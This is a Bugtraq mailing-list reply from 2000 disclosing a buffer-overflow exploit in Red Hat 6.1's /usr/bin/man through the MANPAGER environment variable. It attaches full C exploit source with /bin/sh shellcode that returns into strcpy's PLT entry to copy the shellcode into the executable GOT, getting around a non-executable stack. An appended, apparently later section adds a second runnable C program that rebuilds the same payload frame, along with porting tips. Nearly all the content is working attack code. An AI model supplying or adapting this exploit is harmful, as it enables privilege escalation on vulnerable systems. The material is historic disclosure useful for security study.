List: bugtraq
Subject: Re: man-exploit for MANPAGER environment...
From: Mariusz Woloszyn <emsi () IT ! PL>
Date: 2000-04-26 8:28:46
On Mon, 24 Apr 2000 psychoid@GMX.NET wrote:
> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
>
> - snip -
>
> /*
> * MAN-Exploit for MANPAGER environmental variable.
> * rh 6.x, tested on rh 6.1
> * written by psychoid/tCl
> * gives egid man.
> *
> * Originally discovered by lcamtuf.
> * educational. yes.
> *
> */
>
For absolutely FULL disclosure here is wonderful man sploit (already
posted to vuln-dev in thread of sth...) that works cool even if stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-04-15&msg=Pine.GSO.4.03.10004201510040.12388-100000@zloty.it.com.pl).
GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.
Kil3r / Emsi / M.C.Mar /
--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland
["3man.c" (TEXT/PLAIN)]
/*
 * Rewritten from:
 * (c) 2000 babcia padlina / b0f
 * (lcamtuf's idea)
 * by Kil3r of Lam3rZ
 * for nonexec stack environment
 *
 * redhat 6.1 (and others) /usr/bin/man exploit
 *
 * Instead of returning into the stack, the overwritten return address
 * points at strcpy()'s PLT entry with a fake frame behind it, so that
 * strcpy() copies the shellcode from the stack into the (writable and
 * executable) GOT and then "returns" into that copy.  i386 only.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/stat.h>

/* classic execve("/bin/sh") shellcode; passed to man as env[1] */
char execshell[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define STRCPY    0x80490e4    /* <== strcpy() PLT entry */
#define GOT       0x805038c    /* <== strcpy() GOT entry */
#define NOP       0x90
#define BUFSIZE   (4033+38)    /* saved return address sits at BUFSIZE-4 */
#define RET       STRCPY       /* 0x46464646 to locate the offset */
#define _BIN_SH   0xbfffffe7   /* <== where we have "/bin/sh" string,
                                  currently useless ;) */
#define SHELLCODE 0xbfffffc1   /* <== where execle() places execshell */
#define PAYLOAD   (BUFSIZE - 4 + 4 * sizeof(unsigned int))   /* bytes before NUL */

int main(int argc, char **argv)
{
    char buf[PAYLOAD + 1];     /* fill + four-word fake frame + terminator */
    char *env[3];
    unsigned int *ap;

    (void)argc;
    (void)argv;

    memset(buf, NOP, BUFSIZE - 4);            /* NOP fill up to the saved EIP */
    ap = (unsigned int *)(buf + BUFSIZE - 4);
    *ap++ = RET;        /* saved EIP        -> strcpy@plt */
    *ap++ = GOT + 4;    /* strcpy "returns" -> GOT+4, where the copy lands */
    *ap++ = GOT + 4;    /* strcpy dest      -> GOT+4 */
    *ap++ = SHELLCODE;  /* strcpy src       -> execshell on the stack */
    buf[PAYLOAD] = '\0';                      /* terminate inside buf */
    fprintf(stderr, "RET: 0x%x SHELLCODE: 0x%x\n", RET, SHELLCODE);

    memcpy(buf, "MANPAGER=", 9);
    env[0] = buf;
    /* env[1] = "/bin/sh"; */
    env[1] = execshell;
    env[2] = (char *)0;
    /* use execle to have shellcode and other params at fixed addr!!! */
    execle("/usr/bin/man", "man", "ls", (char *)0, env);
    return 0;
}
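The fake-frame layout that 3man.c relies on, as an added, host-runnable C example that is not part of the original post: it builds the MANPAGER string the same way (saved EIP -> strcpy@plt, then GOT+4 as both strcpy's return address and its destination, then the shellcode address as its source) and adds the check a practitioner wants before using such a frame: none of the four words may contain a NUL byte, because man's strcpy stops copying there and the rest of the frame never reaches the stack. The addresses are the ones hard-coded in 3man.c for one RH 6.1 /usr/bin/man build and are assumptions for any other binary; the function names (build_manpager_payload, has_nul_byte, demo_*) are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values from the attached 3man.c; they belong to one RH 6.1 build of
 * /usr/bin/man and are assumed here only to reproduce that layout. */
#define STRCPY_PLT     0x080490e4u   /* strcpy() PLT entry */
#define STRCPY_GOT     0x0805038cu   /* strcpy() GOT entry */
#define SHELLCODE_ADDR 0xbfffffc1u   /* execshell string placed by execle() */
#define NOP            0x90
#define PREFIX         "MANPAGER="
#define PREFIX_LEN     (sizeof(PREFIX) - 1)
#define FRAME_OFF      (4033 + 38 - 4)       /* offset of the saved EIP slot */
#define PAYLOAD_LEN    (FRAME_OFF + 4 * 4)   /* prefix + fill + four words */

/* The fake frame, in stack order from the overwritten saved EIP upwards. */
struct fake_frame {
    uint32_t ret;        /* saved EIP -> strcpy@plt */
    uint32_t strcpy_ret; /* strcpy's "return address" -> GOT+4, the copy */
    uint32_t dest;       /* strcpy arg 1 -> GOT+4 (writable and executable) */
    uint32_t src;        /* strcpy arg 2 -> shellcode on the non-exec stack */
};

/* 1 if v has a zero byte: man's strcpy would stop copying there. */
int has_nul_byte(uint32_t v)
{
    return (v & 0xffu) == 0 || (v & 0xff00u) == 0 ||
           (v & 0xff0000u) == 0 || (v & 0xff000000u) == 0;
}

/* i386 is little-endian; pack explicitly so this also runs on a 64-bit host. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Writes the NUL-terminated "MANPAGER=..." string into out and returns its
 * length, or -1 if out is too small or a frame word contains a NUL byte. */
int build_manpager_payload(unsigned char *out, size_t outsz,
                           const struct fake_frame *f)
{
    uint32_t words[4] = { f->ret, f->strcpy_ret, f->dest, f->src };
    size_t i;

    if (outsz < PAYLOAD_LEN + 1)
        return -1;
    for (i = 0; i < 4; i++)
        if (has_nul_byte(words[i]))
            return -1;

    memset(out, NOP, FRAME_OFF);             /* NOP fill up to the saved EIP */
    memcpy(out, PREFIX, PREFIX_LEN);         /* env var name, as 3man.c does */
    for (i = 0; i < 4; i++)
        put_le32(out + FRAME_OFF + 4 * i, words[i]);
    out[PAYLOAD_LEN] = '\0';                 /* terminate inside the buffer */
    return (int)PAYLOAD_LEN;
}

static unsigned char demo_buf[PAYLOAD_LEN + 1];

/* Builds the payload with 3man.c's addresses; returns its length. */
int demo_build(void)
{
    struct fake_frame f = { STRCPY_PLT, STRCPY_GOT + 4, STRCPY_GOT + 4,
                            SHELLCODE_ADDR };
    return build_manpager_payload(demo_buf, sizeof demo_buf, &f);
}

/* Byte i of the last demo_build() result, or -1 when out of range. */
int demo_byte(size_t i)
{
    return i <= PAYLOAD_LEN ? demo_buf[i] : -1;
}

/* A frame whose return address has a zero low byte must be rejected. */
int demo_build_rejects_nul(void)
{
    struct fake_frame f = { 0x08048000u, STRCPY_GOT + 4, STRCPY_GOT + 4,
                            SHELLCODE_ADDR };
    return build_manpager_payload(demo_buf, sizeof demo_buf, &f);
}

int main(void)
{
    int n = demo_build();
    size_t i;

    printf("payload: %d bytes, saved EIP at value offset %zu\n",
           n, (size_t)(FRAME_OFF - PREFIX_LEN));
    for (i = 0; i < 4; i++)
        printf("  frame[%zu] = %02x %02x %02x %02x\n", i,
               demo_buf[FRAME_OFF + 4 * i], demo_buf[FRAME_OFF + 4 * i + 1],
               demo_buf[FRAME_OFF + 4 * i + 2], demo_buf[FRAME_OFF + 4 * i + 3]);
    return n < 0;
}
```

The NUL check is the one that bites first when porting this to another binary: a PLT or GOT address like 0x08048000 cannot be delivered through strcpy at all, and the same applies to any address on the path to the shellcode.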